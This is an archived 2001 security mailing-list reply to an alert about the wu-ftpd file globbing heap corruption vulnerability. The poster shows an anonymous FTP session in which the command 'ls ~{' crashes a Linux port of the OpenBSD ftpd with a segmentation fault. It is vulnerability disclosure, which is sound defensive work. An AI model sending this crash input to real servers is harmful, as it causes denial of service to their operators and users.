Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability

From: script0r (script0rat_private)
Date: Wed Nov 28 2001 - 15:36:19 PST

  • Next message: Flavio Veloso: "Re: [CERT-intexxia] libgtop_daemon Remote Format String Vulnerability" 

    >
> --------------------------------------------------------------------------
-
>                              Security Alert
>
> Subject:      Wu-Ftpd File Globbing Heap Corruption Vulnerability
> BUGTRAQ ID:   3581                   CVE ID:         CVE-MAP-NOMATCH
> Published:    Nov 27, 2001           Updated:        Nov 28, 2001
> 01:12:56
>
> Remote:       Yes                    Local:          No
> Availability: Always                 Authentication: Not Required
> Credibility:  Vendor Confirmed       Ease:           No Exploit
> Available Class:        Failure to Handle Exceptional Conditions
>
> Impact:   10.0           Severity: 10.0            Urgency:  8.2
>
> Last Change:  Initial analysis.
> --------------------------------------------------------------------------

I am running the a linux port of the bsd ftpd and it might be vulnerable to
a similar attack,

ftp localhost
Connected to localhost.
220 playlandFTP server (Version 6.5/OpenBSD, linux port 0.3.3) ready.
Name (localhost:user): ftp
331 Guest login ok, type your name as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
200 PORT command successful.
421 Service not available, remote server has closed connection

in inetd I find an error stating that the ftpd process has died unexpectedly

Nov 28 14:21:28 playland inetd[82]: pid 16341: exit signal 11

    This archive was generated by hypermail 2b30 : Wed Nov 28 2001 - 16:54:56 PST